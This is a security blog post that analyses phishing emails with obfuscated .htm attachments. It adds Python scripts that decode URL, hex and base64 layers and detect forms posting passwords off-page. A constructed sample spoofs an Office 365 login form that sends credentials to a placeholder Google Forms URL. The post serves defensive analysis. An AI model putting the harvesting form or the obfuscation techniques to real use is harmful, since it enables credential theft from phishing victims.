So the HexNinja has been spending a lot of time going phishing. Well, more correctly, examining phishing emails and watching them evolve as they do their best to avoid spam detection while also gaining your confidence.
One of the questions I get asked is how the phishing email got into our mail system without being flagged as malicious.
Besides the obvious issues of SPF, DKIM and DMARC (or the lack thereof), I am finding many phishing emails containing .htm attachments.
They always have a great title like Remittance #763.htm or Invoice #692.htm. If your job is to process payments and balance the books, and the email has come from a known contact such as a customer or supplier, then the motivation to open an .htm attachment is high.
Examining the contents of many of these .htm files, they don't look like human-readable HTML. To obfuscate their contents they rely on one encoding, or a combination of encodings, to hide their true intentions and to fool your email protection systems.
So, armed with CyberChef (https://gchq.github.io/CyberChef/), we can begin experimenting with how the files are encoded.
The four main techniques I am seeing are:
- URL encoding
- Base64
- Hexadecimal encoding
- JavaScript packing
URL ENCODING
Try pasting that percent-encoded string into your browser's address bar and it automatically resolves to www.thehexninja.com: the browser turns each %XX sequence back into the character it stands for.
We can get CyberChef to do the heavy lifting of URL decoding. Copy the whole encoded block within the quotes and paste it into CyberChef using the URL Decode operation, as shown below.
This renders to a simple embedded link, as shown below.
So we can see how this simple technique can be used to evade basic mail scanners, especially if the embedded link itself is not obviously malicious, such as a OneDrive, Dropbox or SharePoint link, or a page on another website.
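Here is a small Python script, added to this post as an example (it is not from the original write-up and is not a CyberChef recipe), that does the URL Decode step programmatically and goes a little further than the text: it also unwraps the \xNN hexadecimal escapes listed above, handles the %uXXXX form that JavaScript's unescape() accepts, and keeps decoding until the output stops changing, because phishers often stack layers (a %25 that decodes to % and then decodes again). The .htm fragment inside it is constructed for the example; the only link it hides is www.thehexninja.com.

```python
import re
from urllib.parse import unquote

# Constructed .htm fragment in the shape of the attachments described above
# (not a real sample). Both strings hide a link to www.thehexninja.com: the
# first is percent-encoded twice over, the second uses \xNN hex escapes.
SAMPLE_HTM = r'''<html><body>
<script>
document.write(unescape("%3Ca%20href%3D%22https%253A%252F%252Fwww.thehexninja.com%252Fremit%22%3EView%20Remittance%3C%2Fa%3E"));
document.write("\x3c\x61\x20\x68\x72\x65\x66\x3d\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x68\x65\x68\x65\x78\x6e\x69\x6e\x6a\x61\x2e\x63\x6f\x6d\x2f\x22\x3e\x4f\x70\x65\x6e\x3c\x2f\x61\x3e");
</script>
</body></html>'''

def unescape_js(s: str) -> str:
    """One pass of what JavaScript's unescape() does: %XX and %uXXXX sequences.
    urllib.parse.unquote does not understand %uXXXX, so convert those first."""
    s = re.sub(r"%u([0-9A-Fa-f]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s)

def unhex_js(s: str) -> str:
    """Decode JavaScript \\xNN string escapes (the hexadecimal encoding case)."""
    return re.sub(r"\\x([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), s)

def peel(s: str, max_passes: int = 8):
    """Alternate hex and percent decoding until the text stops changing.
    Returns (decoded, passes). One pass is what CyberChef's URL Decode does;
    a second pass is needed when the author double-encoded (%25 -> %)."""
    passes = 0
    while passes < max_passes:
        decoded = unescape_js(unhex_js(s))
        if decoded == s:
            break
        s, passes = decoded, passes + 1
    return s, passes

# A double- or single-quoted JavaScript string literal, backslash escapes allowed.
STRING_LITERAL = re.compile(r'"((?:[^"\\]|\\.)*)"|\'((?:[^\'\\]|\\.)*)\'')

def recover_links(htm: str):
    """Peel every quoted string in the attachment and report the href targets
    that fall out, with the number of decoding layers each one was under."""
    findings = []
    for m in STRING_LITERAL.finditer(htm):
        literal = m.group(1) if m.group(1) is not None else m.group(2)
        decoded, passes = peel(literal)
        for href in re.findall(r"href=[\"']?([^\"'\s>]+)", decoded, re.I):
            findings.append({"url": href, "layers": passes, "decoded": decoded})
    return findings

if __name__ == "__main__":
    for f in recover_links(SAMPLE_HTM):
        print(f"{f['layers']} layer(s): {f['url']}")
        print("   ", f["decoded"])
```

The layer count is the useful signal when triaging a batch of attachments: a legitimate invoice page has no reason to percent-encode its own markup twice, and any result that still contains % or \x after eight passes is worth opening in CyberChef by hand.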
Base64 Encoding
Sometimes the .htm attachment contains base64-encoded sections, typically images embedded as data URIs and prefixed with the image's MIME type, such as image/png or image/jpeg.
We can copy these encoded sections and paste them into CyberChef (From Base64).
We can now paste the hex output into a hex editor and save it as a JPG (image/jpeg) or PNG (image/png). Check the first bytes before trusting the label: a PNG starts with 89 50 4E 47 and a JPEG with FF D8 FF, and a blob that claims to be an image but starts with neither deserves a closer look.
The first PNG image decodes to:
The second image is a JPG and renders as:
The fourth image decodes to:
When these images are overlaid they appear as:
This is the classic spoofed Microsoft Office 365 login page.
Hiding beneath the enticing image of the web page is the code that takes the username and password and submits them in a POST to a Google Form, capturing the victim's credentials.
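As an added example (not the author's code), the Python below carves the base64 data: URIs out of an .htm attachment, checks the declared MIME type against the file's magic bytes before you save it, and then locates the form that receives the credentials. The attachment fragment, the image bytes (signature-only, not renderable pictures) and the Google Forms URL with its EXAMPLE_FORM_ID are all constructed for the demonstration.

```python
import base64
import html
import re
from urllib.parse import urlparse

# Constructed stand-ins for the embedded images: genuine PNG/JPEG signatures
# followed by padding, enough for type sniffing but not renderable pictures.
FAKE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
FAKE_JPG = b"\xff\xd8\xff\xe0" + b"\x00" * 16

def _b64(data: bytes) -> str:
    return base64.b64encode(data).decode("ascii")

# Constructed .htm fragment in the shape of the spoofed Office 365 page described
# above. The third image is deliberately mislabelled (declares PNG, carries JPEG
# bytes); the Google Forms URL and EXAMPLE_FORM_ID are placeholders.
SAMPLE_HTM = f'''<html><body>
<img src="data:image/png;base64,{_b64(FAKE_PNG)}">
<img src="data:image/jpeg;base64,{_b64(FAKE_JPG)}">
<img src="data:image/png;base64,{_b64(FAKE_JPG)}">
<form method="post" action="https://docs.google.com/forms/d/e/EXAMPLE_FORM_ID/formResponse">
  <input type="email" name="entry.1001" placeholder="Email, phone, or Skype">
  <input type="password" name="entry.1002" placeholder="Password">
  <button type="submit">Sign in</button>
</form>
</body></html>'''

# Magic bytes for the image types that turn up in these attachments.
MAGIC = (
    (b"\x89PNG\r\n\x1a\n", "image/png", "png"),
    (b"\xff\xd8\xff", "image/jpeg", "jpg"),
    (b"GIF87a", "image/gif", "gif"),
    (b"GIF89a", "image/gif", "gif"),
)

def sniff(data: bytes):
    """Identify a decoded blob by its leading bytes, not by what the HTML claims."""
    for sig, mime, ext in MAGIC:
        if data.startswith(sig):
            return mime, ext
    return "application/octet-stream", "bin"

DATA_URI = re.compile(r"data:([\w/.+-]+);base64,([A-Za-z0-9+/=\s]+)", re.I)

def extract_data_uris(htm: str):
    """Carve every base64 data: URI, decode it and compare declared vs actual type.
    A mismatch (image/png that is really JPEG, or not an image at all) is worth
    a closer look: it may be a second-stage payload hiding as a picture."""
    blobs = []
    for m in DATA_URI.finditer(htm):
        declared = m.group(1).lower()
        raw = base64.b64decode(re.sub(r"\s+", "", m.group(2)), validate=True)
        actual, ext = sniff(raw)
        blobs.append({
            "declared": declared, "actual": actual, "ext": ext,
            "size": len(raw), "data": raw, "mismatch": declared != actual,
        })
    return blobs

def find_credential_forms(htm: str):
    """Locate <form> elements that collect a password and post it off-page.
    The attachment is a local file, so any absolute action URL means the
    credentials leave the victim's machine; the Google Forms variant described
    above is flagged separately."""
    findings = []
    for fm in re.finditer(r"<form\b([^>]*)>(.*?)</form>", htm, re.I | re.S):
        attrs, body = fm.group(1), fm.group(2)
        action_m = re.search(r"\baction=[\"']([^\"']+)", attrs, re.I)
        action = html.unescape(action_m.group(1)) if action_m else ""
        method_m = re.search(r"\bmethod=[\"'](\w+)", attrs, re.I)
        method = method_m.group(1).upper() if method_m else "GET"
        types = [t.lower() for t in re.findall(r"<input\b[^>]*\btype=[\"'](\w+)", body, re.I)]
        host = urlparse(action).netloc.lower()
        findings.append({
            "action": action, "method": method, "host": host,
            "collects_password": "password" in types,
            "exfiltrates": "password" in types and host != "",
            "google_form": host == "docs.google.com" and "/forms/" in action,
        })
    return findings

if __name__ == "__main__":
    for i, b in enumerate(extract_data_uris(SAMPLE_HTM), 1):
        flag = "  <-- declared type does not match magic bytes" if b["mismatch"] else ""
        print(f"image {i}: declared {b['declared']}, actual {b['actual']}, {b['size']} bytes{flag}")
        # Save with the extension the bytes say, not the one the HTML says.
        with open(f"image{i}.{b['ext']}", "wb") as fh:
            fh.write(b["data"])
    for f in find_credential_forms(SAMPLE_HTM):
        print(f"form: {f['method']} -> {f['action']}")
        if f["exfiltrates"]:
            print("  posts a password to", f["host"], "(Google Forms)" if f["google_form"] else "")
```

Saving by sniffed type rather than declared type is the same check you would do in the hex editor step, just automated; the form scan gives you the exfiltration URL to block or report without having to render the page.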
Until next time, the hexninja says:
Stop Sneaky Phishers!
Encoding to Hide Data
Never Trust The Phish